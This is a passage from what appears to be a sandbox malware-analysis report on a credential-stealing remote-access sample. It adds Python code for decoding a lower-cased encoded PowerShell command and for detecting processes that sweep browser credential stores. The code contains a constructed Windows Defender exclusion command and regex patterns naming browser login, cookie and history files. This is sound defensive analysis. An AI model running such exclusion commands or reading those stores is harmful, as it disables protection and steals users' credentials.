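        group = blob[start:start + 4]
        survivors = [c for c in map(_group_bytes, _case_variants(group))
                     if _plausible(c, offset)]
        if not survivors:                    # non-ASCII script text ends up here
            raise ValueError(f"group {start // 4} ({group!r}) has no UTF-16LE/ASCII reading")
        for i in range(len(survivors[0])):
            if (offset + i) % 2 == 0:        # even offset = the character byte
                chars.append({chr(chunk[i]) for chunk in survivors})
        offset += len(survivors[0])
    return chars


def pin_with_hints(chars, hints):
    """Collapse ambiguous positions wherever a known, distinctive substring fits."""
    chars = [set(s) for s in chars]
    for hint in hints:
        for start in range(len(chars) - len(hint) + 1):
            if all(hint[k] in chars[start + k] for k in range(len(hint))):
                for k in range(len(hint)):
                    chars[start + k] = {hint[k]}
    return chars


def render(chars) -> str:
    """Unique positions as text, ambiguous ones as [alt1|alt2]."""
    return "".join(next(iter(s)) if len(s) == 1 else "[" + "|".join(sorted(s)) + "]"
                   for s in chars)


def b64_search_terms(needle: str) -> list:
    """The three base64 spellings of a UTF-16LE substring, one per byte alignment;
    this is how a Sigma rule matches a cmdlet inside an -enc blob without decoding."""
    raw = needle.encode("utf-16-le")
    terms = []
    for shift in range(3):
        enc = base64.b64encode(b"\x00" * shift + raw).decode().rstrip("=")
        head, tail = (0, 2, 3)[shift], (1 if (shift + len(raw)) % 3 else 0)
        terms.append(enc[head:len(enc) - tail])   # drop chars that mix in neighbours
    return terms


# Constructed sample (not taken from the report).
SAMPLE_CMD = r"Add-MpPreference -ExclusionPath C:\Users\user\Desktop\b39wW3jYKO.exe"
SAMPLE_BLOB = encode_enc(SAMPLE_CMD)
KNOWN = ["Add-MpPreference", "-ExclusionPath", "-ExclusionProcess", "C:\\Users\\"]

if __name__ == "__main__":
    cands = restore_lowercased_enc(SAMPLE_BLOB.lower())   # what a case-folded report shows
    print(decode_enc(SAMPLE_BLOB))
    print(render(cands), render(pin_with_hints(cands, KNOWN)), sep="\n")
```

Read against the cmdlet names and the path fragments already visible in the report, the blob above resolves to four Add-MpPreference calls: `-ExclusionPath` and `-ExclusionProcess` for the sample on the Desktop, then the same pair for the OneDrive.exe copy under Documents, so both the files and anything those processes open are excluded from Defender scanning. The account name embedded in the blob is not the `user` that the report prints in its paths. Because the command line was folded to lower case, a Sigma rule that matches the three base64 spellings case-sensitively will not fire on this line; match case-insensitively or on the decoded text.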

                        Language, Device and Operating System Detection

Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\arndry.exe, type: DROPPED
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Queries volume information: C:\Users\user\Desktop\b39wW3jYKO.exe VolumeInformation
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll VolumeInformation
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.dll VolumeInformation
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformation
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll VolumeInformation
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation (listed 3 times)
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation (listed 3 times)
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Serialization\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Serialization.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (listed 2 times)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation (listed 3 times)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (listed 3 times)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\Documents\OneDrive.exe | Queries volume information: C:\Users\user\Documents\OneDrive.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\arndry.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\arndry.exe VolumeInformation
Source: C:\Users\user\Documents\OneDrive.exe | Queries volume information: C:\Users\user\Documents\OneDrive.exe VolumeInformation
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: Amcache.hve.12.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.12.dr | Binary or memory string: msmpeng.exe
Source: Amcache.hve.12.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.12.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.12.dr | Binary or memory string: MsMpEng.exe
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                        Stealing of Sensitive Information

Source: Yara match | File source: 0.2.b39wW3jYKO.exe.1419c0e0000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.b39wW3jYKO.exe.1419c0e0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.4651442435.000001419C0E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: b39wW3jYKO.exe PID: 6412, type: MEMORYSTR
Source: Yara match | File source: 0.2.b39wW3jYKO.exe.1419c0e0000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.b39wW3jYKO.exe.1419c0e0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.4651442435.000001419C0E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.4618510904.00000141820D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: b39wW3jYKO.exe PID: 6412, type: MEMORYSTR
Source: Yara match | File source: 9.0.arndry.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000009.00000000.2419775202.00000000001D2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: arndry.exe PID: 3804, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\arndry.exe, type: DROPPED
Source: Yara match | File source: 9.0.arndry.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000009.00000002.2501821797.000000000239D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000000.2419775202.00000000001D2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.4618510904.00000141820D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: b39wW3jYKO.exe PID: 6412, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: arndry.exe PID: 3804, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\arndry.exe, type: DROPPED
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: Yara match | File source: 0.2.b39wW3jYKO.exe.1419c0e0000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.b39wW3jYKO.exe.1419c0e0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.4651442435.000001419C0E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.4618510904.00000141820D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: b39wW3jYKO.exe PID: 6412, type: MEMORYSTR
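The "File opened" lines above are the stealer's footprint on the host: one non-browser process reading the Chrome, Edge and Firefox credential, cookie and history stores in a single sweep. That pattern is what an endpoint detection has to key on, since each individual open looks like a browser doing its job. The following is an added example, not Joe Sandbox code or a shipped detection rule: it takes file-access events in a constructed "<image> | <opened path>" form, matches the paths listed above with profile-agnostic patterns, ignores the browser reading its own store, and escalates a process that touches several store kinds or several browser families. The event lines are constructed (the artifact paths are the ones from this report, the browser and explorer.exe events are made up), and the allow-listed browser binary names are an assumption.

```python
"""Flag non-browser processes that read browser credential, cookie and history stores.

Added example, not Joe Sandbox code. Events are constructed in a "<image> | <path>"
form; the artifact paths are the ones this report lists, the rest is made up.
"""
import re
from collections import defaultdict

# Profile directory names vary ("Default", "Profile 1", "<hash>.default-release"),
# so each store is matched with a wildcard on that path component.
ARTIFACTS = [
    (re.compile(r"\\Google\\Chrome\\User Data\\[^\\]+\\Login Data$", re.I), "chrome-credentials"),
    (re.compile(r"\\Google\\Chrome\\User Data\\[^\\]+\\(Network\\)?Cookies$", re.I), "chrome-cookies"),
    (re.compile(r"\\Google\\Chrome\\User Data\\[^\\]+\\Web Data$", re.I), "chrome-autofill"),
    (re.compile(r"\\Google\\Chrome\\User Data\\[^\\]+\\History$", re.I), "chrome-history"),
    (re.compile(r"\\Microsoft\\Edge\\User Data\\[^\\]+\\Login Data$", re.I), "edge-credentials"),
    (re.compile(r"\\Microsoft\\Edge\\User Data\\[^\\]+\\History$", re.I), "edge-history"),
    (re.compile(r"\\Mozilla\\Firefox\\Profiles\\[^\\]+\\cookies\.sqlite$", re.I), "firefox-cookies"),
    (re.compile(r"\\Mozilla\\Firefox\\Profiles\\[^\\]+\\places\.sqlite$", re.I), "firefox-history"),
    # Not opened in this report; the Firefox login store, included for completeness.
    (re.compile(r"\\Mozilla\\Firefox\\Profiles\\[^\\]+\\(logins\.json|key4\.db)$", re.I), "firefox-credentials"),
]

# Assumed owner binaries: a browser reading its own store is not an alert.
BROWSER_BINARIES = {"chrome": {"chrome.exe"}, "edge": {"msedge.exe"}, "firefox": {"firefox.exe"}}

# Constructed events: artifact paths from the report, process mix made up.
EVENTS = r"""
C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
C:\Users\user\Desktop\b39wW3jYKO.exe | C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
C:\Users\user\Desktop\b39wW3jYKO.exe | C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
C:\Users\user\Desktop\b39wW3jYKO.exe | C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite
C:\Users\user\Desktop\b39wW3jYKO.exe | C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
C:\Windows\explorer.exe | C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences
"""


def classify_event(image, path):
    """Store kind touched by a foreign process, or None if benign / not a store."""
    for pattern, kind in ARTIFACTS:
        if pattern.search(path):
            family = kind.split("-")[0]
            if image.lower().rsplit("\\", 1)[-1] in BROWSER_BINARIES[family]:
                return None
            return kind
    return None


def detect(text):
    """[(image, severity, sorted store kinds)] for every process worth an alert."""
    touched = defaultdict(set)
    for line in text.splitlines():
        if " | " not in line:
            continue
        image, path = (part.strip() for part in line.split(" | ", 1))
        kind = classify_event(image, path)
        if kind:
            touched[image].add(kind)
    alerts = []
    for image, kinds in touched.items():
        families = {k.split("-")[0] for k in kinds}
        severity = "high" if any(k.endswith(("credentials", "cookies")) for k in kinds) else "medium"
        if len(families) >= 2 or len(kinds) >= 3:
            severity = "critical"        # a sweep across stores is stealer behaviour
        alerts.append((image, severity, sorted(kinds)))
    return alerts


if __name__ == "__main__":
    for image, severity, kinds in detect(EVENTS):
        print(f"{severity:8} {image}: {', '.join(kinds)}")
```

The escalation rule is the useful part: a single read of `Login Data` by a third-party password manager or a backup agent is a tuning exercise, while one process reading credentials, cookies and history across two or three browsers within one run is the signature of a stealer, and that is what the Yara hits above label it as.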

                        Remote Access Functionality

Source: Yara match | File source: 0.2.b39wW3jYKO.exe.1419c0e0000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.b39wW3jYKO.exe.1419c0e0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.4651442435.000001419C0E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: b39wW3jYKO.exe PID: 6412, type: MEMORYSTR
Source: Yara match | File source: 0.2.b39wW3jYKO.exe.1419c0e0000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.b39wW3jYKO.exe.1419c0e0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.4651442435.000001419C0E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.4618510904.00000141820D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: b39wW3jYKO.exe PID: 6412, type: MEMORYSTR
Source: Yara match | File source: 9.0.arndry.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000009.00000000.2419775202.00000000001D2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: arndry.exe PID: 3804, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\arndry.exe, type: DROPPED
Source: Yara match | File source: 9.0.arndry.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000009.00000002.2501821797.000000000239D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000000.2419775202.00000000001D2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.4618510904.00000141820D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: b39wW3jYKO.exe PID: 6412, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: arndry.exe PID: 3804, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\arndry.exe, type: DROPPED
                        MITRE ATT&CK Matrix (per tactic, in matrix order; the number in parentheses is the count of matching signatures, and techniques without a number were not observed for this sample):

                        • Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS, Network Trust Dependencies, Network Topology, IP Addresses, Network Security Appliances
                        • Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services, Serverless, Malvertising, Compromise Infrastructure, Domains
                        • Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise, Exploit Public-Facing Application, Supply Chain Compromise, Compromise Software Dependencies and Development Tools
                        • Execution: Windows Management Instrumentation (12), Native API (1), Command and Scripting Interpreter (1), Scheduled Task/Job (1), PowerShell (1), Scheduled Task, Systemd Timers, Container Orchestration Job, Command and Scripting Interpreter, PowerShell, AppleScript
                        • Persistence: DLL Side-Loading (1), Scheduled Task/Job (1), Registry Run Keys / Startup Folder (1), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job, At, Cron, Launchd
                        • Privilege Escalation: Abuse Elevation Control Mechanism (1), DLL Side-Loading (1), Access Token Manipulation (1), Process Injection (12), Scheduled Task/Job (1), Registry Run Keys / Startup Folder (1), Startup Items, Scheduled Task/Job, At, Cron, Launchd
                        • Defense Evasion: Disable or Modify Tools (1), Deobfuscate/Decode Files or Information (11), Abuse Elevation Control Mechanism (1), Obfuscated Files or Information (21), Software Packing (22), DLL Side-Loading (1), Masquerading (1), Modify Registry (1), Virtualization/Sandbox Evasion (151), Access Token Manipulation (1), Process Injection (12)
                        • Credential Access: OS Credential Dumping (1), Input Capture (1), Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem, /etc/passwd and /etc/shadow, Network Sniffing, Input Capture
                        • Discovery: File and Directory Discovery (2), System Information Discovery (23), Security Software Discovery (541), Process Discovery (2), Virtualization/Sandbox Evasion (151), Application Window Discovery (1), System Network Configuration Discovery (1), System Owner/User Discovery, Network Sniffing, Network Service Discovery, System Network Connections Discovery
                        • Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Cloud Services, Direct Cloud VM Connections, Shared Webroot, Software Deployment Tools
                        • Collection: Archive Collected Data (11), Data from Local System (1), Input Capture (1), Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking, Data Staged, Local Data Staging, Remote Data Staging
                        • Command and Control: Ingress Tool Transfer (1), Encrypted Channel (1), Non-Standard Port (1), Non-Application Layer Protocol (2), Application Layer Protocol (2), Multiband Communication, Commonly Used Port, Application Layer Protocol, Web Protocols, File Transfer Protocols, Mail Protocols
                        • Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol, Exfiltration Over Symmetric Encrypted Non-C2 Protocol, Exfiltration Over Asymmetric Encrypted Non-C2 Protocol, Exfiltration Over Unencrypted Non-C2 Protocol
                        • Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery, Defacement, Internal Defacement, External Defacement, Firmware Corruption
                        Behavior Graph (ID: 1535423; Sample: b39wW3jYKO.exe; Startdate: 17/10/2024; Architecture: WINDOWS; Score: 100)

                        Legend (node types used in the graph): Process, Signature, Created File, DNS/IP Info, Is Dropped, Is Windows Process, Number of created Registry Values, Number of created Files, Visual Basic, Delphi, Java, .Net C# or VB.NET, C, C++ or other language, Is malicious, Internet. The numbers in parentheses after a process name are the graph's counts of created registry values and created files for that process.

                        Start node:
                        • DNS/IP: ip-api.com
                        • Signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 17 other signatures
                        • Processes started: b39wW3jYKO.exe (3, 31); OneDrive.exe (3); OneDrive.exe

                        b39wW3jYKO.exe:
                        • DNS/IP: 104.219.239.11, ports 49809, 49841, 6969 (DATAWAGONUS, United States)
                        • Dropped files: C:\Users\user\Documents\OneDrive.exe (PE32+); C:\Users\user\AppData\Local\Temp\arndry.exe (PE32); C:\Users\...\OneDrive.exe:Zone.Identifier (ASCII)
                        • Signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Drops PE files to the document folder of the user; Encrypted powershell cmdline option found; 3 other signatures
                        • Processes started: arndry.exe (14, 2); powershell.exe (23)

                        OneDrive.exe:
                        • Signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file

                        arndry.exe:
                        • DNS/IP: ip-api.com 208.95.112.1, ports 49832, 80 (TUT-ASUS, United States)
                        • Signatures: Antivirus detection for dropped file; Machine Learning detection for dropped file; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                        • Processes started: WerFault.exe (22, 16)

                        powershell.exe:
                        • Signatures: Loading BitLocker PowerShell Module
                        • Processes started: WmiPrvSE.exe; conhost.exe

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.